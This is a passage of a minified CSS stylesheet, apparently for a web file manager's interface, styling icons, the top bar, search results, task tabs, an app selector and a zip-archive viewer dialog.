\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');}.x-group-guest{background-image:url("../../../images/file_icon/icon_others/groupGuest.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');}.x-group-self-root{background-image:url("../../../images/file_icon/icon_others/groupSelfRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');}.x-group-root{background-image:url("../../../images/file_icon/icon_others/groupRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');}.x-group-public{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-tree-self{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-computer{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-tree-fav{background-image:url("../../../images/file_icon/icon_others/treeFav.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');}.x-edit{background-image:url("../../../images/file_icon/icon_others/edit.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');}.x-search{background-image:url("../../../images/file_icon/icon_others/search.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');}.x-upload{background-image:url("../../../images/file_icon/icon_others/upload.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');}.x-setting{background-image:url("../../../images/file_icon/icon_others/setting.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');}.x-logout{background-image:url("../../../images/file_icon/icon_others/logout.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');}.x-app-store{background-image:url("../../../images/file_icon/icon_others/appStore.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');}.x-error{background-image:url("../../../images/file_icon/icon_others/error.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');}.x-info{background-image:url("../../../images/file_icon/icon_others/info.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');}.frame-fullscreen{position:fixed;z-index:999499;left:0;top:0;}.font-icon{font-family:FontAwesome;font-style:normal;color:inherit;}.dragMaskView{position:absolute;top:0;left:0;right:0;bottom:0;z-index:888;background:#fff;opacity:0.01;filter:alpha(opacity=1);-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.content-box .ace_cjk{width:1em !important;}.content-box .ace_static_highlight{font-size:1.15em;}.aui-buttons button{font-size:1em;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.dialog-change-max,.dialog-change-max .aui-main{-webkit-transition:all 0.25s;-moz-transition:all 0.25s;-o-transition:all 0.25s;-ms-transition:all 0.25s;transition:all 0.25s;}.aui-title span{position:absolute;width:80%;overflow:hidden;height:30px;word-break:break-all;text-overflow:ellipsis;white-space:nowrap;}.less-error-message{display:none;}[class^="icon-"],[class*=" icon-"]{background-image:auto;}.btn-group-sm>.btn{padding:4px 10px;line-height:1em;}.btn{padding:6px 14px;border-radius:3px;box-sizing:content-box;}.btn:focus{outline:none;}.btn.btn-default .font-icon{color:#999;}.btn.btn-default:active,.btn.btn-default.active{border-color:#ADADAD;color:#888;}.btn.btn-left{border-top-right-radius:0;border-bottom-right-radius:0;}.btn.btn-middle{border-radius:0;}.btn.btn-right{border-top-left-radius:0;border-bottom-left-radius:0;}.btn.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;}.btn.btn-nomal{padding:4px 12px;}.btn.btn-sm{padding:2px 10px;}.btn.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;}.btn.btn-active{background:#63acff !important;border-color:#4fa1ff !important;border-bottom-color:#449cff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8cc2ff', endColorstr='#63acff');background-image:-webkit-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-moz-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-o-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-ms-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);-pie-background:linear-gradient(to to bottom,#8cc2ff 0,#63acff 100%);}.btn.btn-active:hover,.btn.btn-active:active{background:#3a96ff !important;border-color:#268bff !important;border-bottom-color:#1c86ff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#63acff', endColorstr='#3a96ff');background-image:-webkit-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-moz-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-o-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-ms-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:linear-gradient(to bottom,#63acff 0,#3a96ff 100%);-pie-background:linear-gradient(to to bottom,#63acff 0,#3a96ff 100%);}.btn-group.disabled{opacity:0.6;filter:alpha(opacity=60);}.dropdown-menu{left:auto;right:0px;border-radius:4px;border:1px solid rgba(0,0,0,0.05);box-shadow:0 4px 30px rgba(0,0,0,0.15);max-height:400px;margin-top:0;}.dropdown-menu>li>a:hover,.dropdown-menu .this a,.dropdown-menu>li>a:focus{-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;background-image:none;filter:none;background:#63acff;color:#fff;}.dropdown-menu>li>a{font-weight:inherit;color:#666;}.dropdown-menu>li>a .font-icon{opacity:0.8;}.dropdown-menu:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);border-right:6px solid rgba(0,0,0,0);border-bottom:6px solid #FFF;position:absolute;top:-6px;right:10px;}.dropdown-menu:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);top:-7px;border-bottom:7px solid #CCC;border-bottom-color:rgba(0,0,0,0.2);right:9px;}.dropdown-menu.menu-top:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);top:inherit;border-right:6px solid rgba(0,0,0,0);border-top:6px solid #FFF;border-bottom:none;position:absolute;bottom:-6px;right:10px;}.dropdown-menu.menu-top:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-bottom:none;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);bottom:-7px;border-top:7px solid #CCC;border-top-color:rgba(0,0,0,0.2);right:9px;top:inherit;}.dropdown-menu .divider{margin:0.3em 0;}input{border:1px solid #ddd;background:#fff;outline:none;}input[type="radio"],input[type="checkbox"]{border:none;background:none;}.topbar{width:100%;height:40px;color:#ddd;top:0;background:#63acff;position:absolute;z-index:auto;}.topbar .content{padding:0px;line-height:40px;height:39px;word-break:break-all;}.topbar .content i.font-icon{display:inline-block;padding-right:10px;font-size:1.1em;}.topbar .content .topbar-menu{display:block;text-decoration:none;color:#fff;border:1px solid #4a9eff;overflow:hidden;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;padding:0px 1.2em;border-top:none;border-bottom:none;outline:none;float:left;margin-left:-1px;font-size:14px;}.topbar .content .topbar-menu.title{font-size:20px;width:200px;width:202px\0;padding:0;text-align:center;}.topbar .content .topbar-menu.title:hover{background:none;}.topbar .content .topbar-menu .icon{width:25px;height:25px;margin-right:5px;padding:0;margin-top:-4px;font-size:13px;line-height:25px;text-align:center;background:none;}.topbar .content .title img{max-width:200px;max-height:44px;}.topbar .content .open .topbar-menu,.topbar .content .topbar-menu:hover,.topbar .content .topbar-menu.this{background:#4a9eff;}.topbar .content .menu-desktop:before{content:"\f108";}.topbar .content .menu-explorer:before{content:"\f0ae";}.topbar .content .menu-editor:before{content:"\f044";}.topbar .content .top-left{overflow:hidden;height:40px;width:70%;}.topbar .content .top-right{position:absolute;right:0px;top:0px;margin-right:0px;height:40px;}.topbar .content .top-right .menu-group{height:40px;margin-right:-1px;float:left;position:relative;}.topbar .content .top-right .topbar-menu{display:inline-block;padding:0px 6px;margin-right:1px;}.topbar .content .top-right .topbar-menu i{padding-right:3px;}.topbar .content .top-right .btn{color:#fff;}.topbar .content .top-right ul a{line-height:30px;height:30px;display:block;padding:0px 1.7em;border:none;overflow:hidden;}.topbar .content .top-right ul a:hover,.topbar .content .top-right ul a.this{margin-right:0px;}.topbar .content .top-right ul a.this{background:#63acff;color:#fff;}.topbar .content .top-right ul .font-icon{width:18px;display:inline-block;}.topbar .content .top-right ul.dropdown-menu{margin-top:-1px;}.topbar .content .top-right ul.dropdown-menu.topbar-language{width:470px;padding:10px 5px;}.topbar .content .top-right ul.dropdown-menu.topbar-language li{width:115px;float:left;margin:0 1px 1px 0;}.topbar .content .top-right ul.dropdown-menu.topbar-language a{padding:0 8px 0 8px;height:26px;line-height:26px;font-size:13px;}.topbar .content .top-right ul.dropdown-menu.topbar-language i.flag{padding-right:0px;background-color:#eee;position:relative;top:1px;}.topbar .content .share-title{text-align:center;color:#fff;float:left;margin-left:8px;margin-right:7px;}.topbar .content .share-title-info{color:#fff;font-size:1.25em;background:#eee;background:rgba(0,0,0,0.2);border-radius:4px;padding:6px;}.topbar .content .share-info{color:#fff;float:left;font-size:1em;}.topbar .content .share-info .time{padding-left:5px;color:#fff;padding-right:8px;}.topbar .content .top-right div.share-info-user{margin-right:10px;color:#fff;position:relative;}.topbar .content .top-right div.share-info-user .btn-download,.topbar .content .top-right div.share-info-user .btn.button-my-share{padding:4px 20px;margin-left:5px;}.topbar .content .top-right div.share-info-user .dropdown-toggle{height:16px;}.common-footer{position:fixed;bottom:0px;background:#f8f8f8;color:#999;font-size:1em;width:100%;text-align:center;border-top:1px solid #e8e8e8;height:31px;line-height:32px;overflow:hidden;}.common-footer .copyright-bottom{cursor:pointer;font-size:1.25em;color:#aaa;text-decoration:none;}.common-footer .copyright-bottom:hover{color:#f60;border-bottom:none;}.desktop-widget{z-index:10 !important;}.do-search-box{color:#888;}.do-search-box .search-header{padding:10px;padding-bottom:0px;}.do-search-box .search-header input[type='checkbox']{padding-left:0px;}.do-search-box .search-header label{font-size:1em;}.do-search-box .search-header .btn-right{margin:0px 0 0 -2px;height:25px;width:30px;padding:0;height:28px \9\0;position:absolute !important;}.do-search-box .search-header .s_br{margin-bottom:8px;line-height:25px;}.do-search-box .search-header #search-value,.do-search-box .search-header #search-path,.do-search-box .search-header #search-ext{height:23px;height:27px \0;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:125px;padding-left:10px;padding-right:10px;margin-left:5px;}.do-search-box .search-header #search-value:focus,.do-search-box .search-header #search-path:focus,.do-search-box .search-header #search-ext:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.do-search-box .search-header #search-value{width:190px;margin:0;padding:2px 5px 0px 5px;padding-top:1px \0;}.do-search-box #search-is-case{margin-left:10px;}.do-search-box .search-desc{height:30px;line-height:30px;text-align:center;font-size:13px;margin:0px 10px;border:1px solid #ddd;color:#3196e6;background-image:-webkit-linear-gradient(top,#fff,#def);border-top-left-radius:3px;border-top-right-radius:3px;}.do-search-box .search-result{overflow-y:auto;overflow-x:hidden;position:absolute;top:137px;bottom:0px;right:0px;left:0px;margin:10px;border:1px solid #ddd;border-top:none;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-items{list-style:none;margin:0px;padding:10px 0;font-size:13px;}.do-search-box .search-result .file-item .file-info{height:25px;line-height:25px;cursor:default;padding-left:10px;font-size:13px;color:#444;position:relative;word-wrap:break-word;word-break:break-all;overflow:hidden;}.do-search-box .search-result .file-item .file-info:hover{background:#eee;}.do-search-box .search-result .file-item .file-info .title{height:25px;color:#666;padding-left:5px;}.do-search-box .search-result .file-item .file-info .title:hover{border-bottom:1px solid #1387bb;cursor:pointer;color:#1387bb;}.do-search-box .search-result .file-item .file-info .switch{width:20px;height:20px;display:inline-block;text-align:center;color:#aaa;font-size:14px;}.do-search-box .search-result .file-item .file-info .file-icon{display:inline-block;width:18px;height:18px;}.do-search-box .search-result .file-item .file-info .file-icon img{width:100%;height:100%;}.do-search-box .search-result .file-item .file-info .result-num{margin:0 5px;border-radius:10px;background-color:#dfeaf3;color:#666;font-size:12px;padding:3px 8px;font-weight:bold;}.do-search-box .search-result .file-item .file-info .goto{position:absolute;right:0;top:0;width:30px;height:25px;line-height:25px;text-align:center;color:#bbb;background:#fff;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-item .file-info .goto:hover,.do-search-box .search-result .file-item .file-info:hover .goto:hover{background:#fbbc00;color:#fff;}.do-search-box .search-result .file-item .file-info:hover .goto{display:block;background:#e6e6e6;}.do-search-box .search-result .file-item .keyword{background:#ffef65;color:#000;}.do-search-box .search-result .file-item .result-item{list-style:none;margin:0px;padding:0px;}.do-search-box .search-result .file-item .result-item .result-info{height:25px;margin:0px;padding:0;line-height:25px;padding:0 15px;cursor:default;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}.do-search-box .search-result .file-item .result-item .result-info:hover{background:#eee;}.do-search-box .search-result .file-item .result-item .result-info.this,.do-search-box .search-result .file-item .result-item .result-info.this:hover{background:#63acff;}.do-search-box .search-result .file-item .result-item .result-info.this .line,.do-search-box .search-result .file-item .result-item .result-info.this .search-info,.do-search-box .search-result .file-item .result-item .result-info.this:hover .line,.do-search-box .search-result .file-item .result-item .result-info.this:hover .search-info{color:#fff;}.do-search-box .search-result .file-item .result-item .line{display:inline-block;width:32px;margin-left:7px;padding-right:4px;text-align:right;font-weight:800;color:#aaa;}.do-search-box .search-result .file-item .result-item .search-info{font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;color:#444;}.do-search-box .search-result .file-item.open .file-info .switch .icon-caret-right:before{content:"\f0d7";}#maskViewContent .upload-tips{text-align:center;}#maskViewContent .upload-tips .icon-cloud{opacity:0.8;}#maskViewContent .upload-tips .icon-cloud.cloud2{font-size:180px;}#maskViewContent .upload-tips .icon-cloud.cloud1,#maskViewContent .upload-tips .icon-cloud.cloud3{position:absolute;opacity:0.6;}#maskViewContent .upload-tips .icon-cloud.cloud1{margin-left:-60px;margin-top:110px;-webkit-animation:moveLeftLoop 8.0s infinite ease-in-out;animation:moveLeftLoop 8.0s infinite ease-in-out;}#maskViewContent .upload-tips .icon-cloud.cloud3{margin-left:-50px;margin-top:60px;font-size:60px;animation-delay:4s;-webkit-animation-delay:4s;-webkit-animation:moveLeftLoop 10.0s infinite ease-in-out;animation:moveLeftLoop 10.0s infinite ease-in-out;}#maskViewContent .upload-tips .cloud-moveup{height:70px;}#maskViewContent .upload-tips .cloud-moveup i{position:absolute;margin-left:-23px;margin-top:-16px;}.task-tab{position:fixed;bottom:1px;left:0;width:100%;height:30px;padding-left:50px;z-index:100;background:rgba(0,0,0,0.1);border-top:1px solid rgba(0,0,0,0.15);color:#444;}.task-tab .tabs{height:100%;margin-right:20px;margin-right:60px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.task-tab .tabs .tab{float:left;height:29px;margin-right:2px;white-space:nowrap;text-overflow:ellipsis;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;color:#fff;border-radius:3px;cursor:default;overflow:hidden;font-size:1em;box-shadow:0 0 6px #666;padding-left:4px;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.3)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.3),rgba(255,255,255,0));-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.task-tab .tabs .tab.hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.5),rgba(255,255,255,0));}.task-tab .tabs .tab.this{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.7)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.7),rgba(255,255,255,0));box-shadow:0 0 6px #000;}.tasktab-dragging{position:fixed;position:absolute;z-index:99999;height:30px;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0 0 3px #000;box-shadow:0 0 6px #000;padding-left:4px;white-space:nowrap;text-overflow:ellipsis;border-radius:3px;cursor:default;color:#fff;overflow:hidden;font-size:1em;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.8)', endColorstr='rgba(255,255,255,0.2)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-o-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));-pie-background:linear-gradient(to top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));}.init-loading{position:fixed;left:50%;margin-left:-80px;top:40%;font-size:1.25em;z-index:999999;width:auto;}.init-loading div{padding:20px;background:#000;opacity:0.6;filter:alpha(opacity=60);margin:0 auto;color:#FFF;border-radius:6px;text-align:center;line-height:30px;}.init-loading img{border-radius:10px;}.space-info-bar{width:110px;}.space-info-bar .space-process{width:110px;height:6px;overflow:hidden;background-color:#ddd;margin:0px;border-radius:5px;}.space-info-bar .space-process .space-process-use{width:20%;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;height:100%;background-color:#428bca;border-radius:5px;}.space-info-bar .space-process .space-process-use.warning{background-color:#f00 !important;}.dialog-app-select .app-list{border:1px solid #ddd;padding:25px 0 0 10px;height:280px;overflow:auto;overflow-x:hidden;border-radius:4px;background:#f5f5f5;}.dialog-app-select .app-list .app-item{border:1px solid #f5f5f5;width:95px;height:110px;border-radius:4px;transition:all 0.2s ease 0s;margin:0 10px 10px 0;text-align:center;float:left;color:#444;text-decoration:none;}.dialog-app-select .app-list .app-item:hover{border-color:#77c2ff;background:#def;}.dialog-app-select .app-list .app-item.select{border-color:#559cec;background:#63acff;color:#fff;}.dialog-app-select .app-list .app-item .ico{width:64px;height:64px;display:table-cell;vertical-align:middle;padding:5px 0 0 16px;}.dialog-app-select .app-list .app-item .ico img{width:100%;height:auto;}.dialog-app-select .app-list .app-item .ico .x-item-file{display:block;}.dialog-app-select .app-list .app-item .ico [class^="icon-"].font-icon,.dialog-app-select .app-list .app-item .ico [class*="icon-"].font-icon{width:56px;height:56px;line-height:60px;font-size:28px;padding:0px;text-align:center;margin-top:-2px;border-radius:12px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(3,169,244,0.7)', endColorstr='rgba(63,81,181,0.5)');background-image:-webkit-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-moz-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-o-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-ms-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));-pie-background:linear-gradient(to 164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));color:#fff;display:inline-block;}.appbox{overflow:hidden;padding:0px 10px 0 0;}.appbox .appline{width:100%;margin-bottom:10px;line-height:20px;overflow:hidden;}.appbox .appline .left{float:left;width:80px;text-align:right;padding-right:14px;}.appbox .appline .right{float:left;}.appbox .appline input{margin-right:5px;}.appbox .appline label{display:inline-block;margin-left:-10px;padding:0 5px;}.appbox .appline input[type=text],.appbox .appline textarea{width:275px;padding:0px 5px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:28px;border-radius:3px;}.appbox .appline input[type=text]:focus,.appbox .appline textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.appbox .appline input[type=text].w30{width:50px;}.appbox .appline input[type=text].w20{width:30px;}.appbox .appline textarea{height:100px;}.appbox .appline.icon input{width:232px;}.appbox .appline.icon a{padding:2px 4px;top:0px;border:1px solid #CCC;}.appbox .appline.icon .open{margin-left:-12px;cursor:pointer;margin-top:-4px;font-size:14px;padding:3px 1em 4px 1em;}.appbox .appline.icon a img{width:20px;height:20px;}.zip-view-dialog .aui-content{min-width:400px;position:relative;}.zip-view-dialog .aui-title{height:90px;}.zip-view-dialog .zip-view-content{position:absolute;left:0;right:0;bottom:0;top:0px;margin:0px;min-width:400px;border:none;}.zip-view-dialog .zip-view-content .header{height:90px;background-color:#2c41b3;background-image:linear-gradient(to bottom,#2c41b3 0,#222b5d 100%);color:#fff;position:relative;}.zip-view-dialog .zip-view-content .header .bg{background:url("../../../images/common/banner/fly.png") 100px -300px;width:100%;height:100%;position:absolute;}.zip-view-dialog .zip-view-content .header .icon{width:56px;height:56px;position:absolute;left:20px;top:20px;}.zip-view-dialog .zip-view-content .header .name,.zip-view-dialog .zip-view-content .header .desc{position:absolute;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;width:80%;}.zip-view-dialog .zip-view-content .header .name{margin:22px 0 0 90px;font-size:18px;font-weight:800;}.zip-view-dialog .zip-view-content .header .desc{margin:50px 0 0 90px;}.zip-view-dialog .zip-view-content .zip-header-title{height:23px;line-height:23px;border-bottom:1px solid #ddd;border-top:1px solid #ddd;background:#f6f6f6 url("../../../images/common/bg.gif") 0 -30px;}.zip-view-dialog .zip-view-content .zip-header-title .item{float:left;}.zip-view-dialog .zip-view-content .zip-header-title .item span{display:block;border-right:1px solid #ddd;padding-left:10px;cursor:default;}.zip-view-dialog .zip-view-content .zip-header-title .name{width:60%;}.zip-view-dialog .zip-view-content .zip-header-title .size{width:10%;}.zip-view-dialog .zip-view-content .zip-header-title .mtime{width:30%;}.zip-view-dialog .zip-view-content .zip-header-title .item.mtime span{border-right:none;}.zip-view-dialog .zip-view-content .ztree{padding:0px;position:absolute;top:115px;left:0;right:0px;bottom:0;overflow:auto;}.zip-view-dialog .zip-view-content .ztree li,.zip-view-dialog .zip-view-content .ztree li ul{width:100%;}.zip-view-dialog .zip-view-content .ztree li a{position:relative;padding-left:0;color:#333;text-shadow:none;}.zip-view-dialog .zip-view-content .ztree li a:hover{transition:none;}.zip-view-dialog .zip-view-content .ztree li a.odd{background:#f1f7ff;}.zip-view-dialog .zip-view-content .ztree li a:hover,.zip-view-dialog .zip-view-content .ztree li a.odd:hover{background:#fdeec3;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode,.zip-view-dialog .zip-view-content .ztree li a.odd.curSelectedNode{background:#63acff;color:#fff;}.zip-view-dialog .zip-view-content .ztree li a .name{width:45%;overflow:hidden;position:absolute;word-break:break-all;text-overflow:ellipsis;}.zip-view-dialog .zip-view-content .ztree li a .time{width:27%;opacity:0.8;font-size:12px;position:absolute;left:72%;}.zip-view-dialog .zip-view-content .ztree li a .size{width:10%;opacity:0.8;font-size:12px;position:absolute;left:62%;}.zip-view-dialog .zip-view-content .ztree li a .menu-item-parent{display:none;position:absolute;right:0px;top:0;text-align:center;width:25px;height:24px;background:#fff;background:rgba(50,50,50,0.1);color:#666;}.zip-view-dialog .zip-view-content .ztree li a:hover .menu-item-parent{display:block;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode .menu-item-parent{display:block;color:#fff;}.support-space-not 